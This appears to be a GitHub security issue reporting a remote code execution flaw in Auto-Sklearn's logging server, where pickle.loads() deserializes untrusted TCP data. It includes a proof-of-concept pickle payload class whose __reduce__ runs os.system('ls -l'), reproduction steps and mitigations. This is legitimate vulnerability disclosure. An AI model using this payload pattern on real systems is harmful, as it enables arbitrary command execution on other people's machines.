Remote Code Execution by Pickle Deserialization via LogRecordStreamHandler in Auto-Sklearn

### Description

In the core logging functionality of the Auto-Sklearn framework (`autosklearn/util/logging_.py`), the `LogRecordStreamHandler` class directly uses `pickle.loads()` to deserialize messages received from TCP socket connections without any sanitization, which results in a remote code execution vulnerability.

The vulnerable code is located in the `unPickle()` method of the `LogRecordStreamHandler` class (lines 274-275). This method is called in the `handle()` method (line 270) when processing incoming log records from TCP connections. The server accepts pickled objects over the network and deserializes them without any validation or restriction on what classes can be instantiated. 

### Proof of Concept

**Step 1:** The victim user starts an Auto-Sklearn log server that binds to the network interface:

```bash
python log_server.py --host 0.0.0.0 --port 9020
```

**Step 2:** The attacker can then send malicious pickle-serialized data to the TCP socket. The provided `log_client.py` demonstrates how an attacker can execute arbitrary commands like `ls -l`:

```python
class RCE:
def __reduce__(self):
import os
return (os.system, ("ls -l",))
record = RCE()
send_log_record(args.host, args.port, record)
```

The `RCE` class implements the `__reduce__` method, which is called during pickle deserialization. When the server deserializes this object, it will execute `os.system("ls -l")`, resulting in remote command execution.

To reproduce this issue:
1. Start the log server:
```bash
python log_server.py --host 0.0.0.0 --port 9020
```
2. Run the malicious client:
```bash
python log_client.py --host <target_host> --port 9020
```

We also give a demo video in the attachment, along with log_server.py and log client.py.

### Impact
Remote code execution on the victim's machine over the network. Once the victim starts the Auto-Sklearn log server with network binding, an attacker on the network can gain arbitrary code execution by:

1. Scanning and finding the victim's Auto-Sklearn logging service
2. Sending malicious pickle payloads to the logging port
3. Executing arbitrary system commands with the privileges of the Auto-Sklearn process

This vulnerability is particularly severe because:
- The pickle deserialization is completely unrestricted, allowing execution of any Python code
- No authentication or authorization is required to send log records
- The vulnerability can be exploited by anyone who can reach the server's network interface

We understand that this log server implementation was not originally intended to be exposed as a public service, because our review of the code shows that the log server is started as a secondary process together with the main process and is, by default, meant for internal network use. However, we are concerned that when users deploy Auto-Sklearn, if their network protections are not strict (for example, if the interface is exposed to the public internet or the firewall is not properly configured), this could lead to extremely serious consequences — namely remote code execution (RCE). Since the security of the software should not rely solely on network isolation, we are reporting this vulnerability in the hope that it can be fixed.

### Mitigation
1.Sanitize data before deserialization: Rewrite the unPickle() method to use a custom Unpickler with a restricted find_class() method that only allows safe classes, or replace pickle with more secure serialization methods such as JSON, msgpack, or protocol buffers.

2.Network access control: If the logging service is intended for internal use only, accept connections solely from the internal network (localhost or specific trusted IPs) and reject other connections. 


[log_client.py](https://github.com/user-attachments/files/23650512/log_client.py)
[log_server.py](https://github.com/user-attachments/files/23650513/log_server.py)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Remote Code Execution by Pickle Deserialization via LogRecordStreamHandler in Auto-Sklearn #1766

Description

Proof of Concept

Impact

Mitigation

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Remote Code Execution by Pickle Deserialization via LogRecordStreamHandler in Auto-Sklearn #1766

Description

Description

Proof of Concept

Impact

Mitigation

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions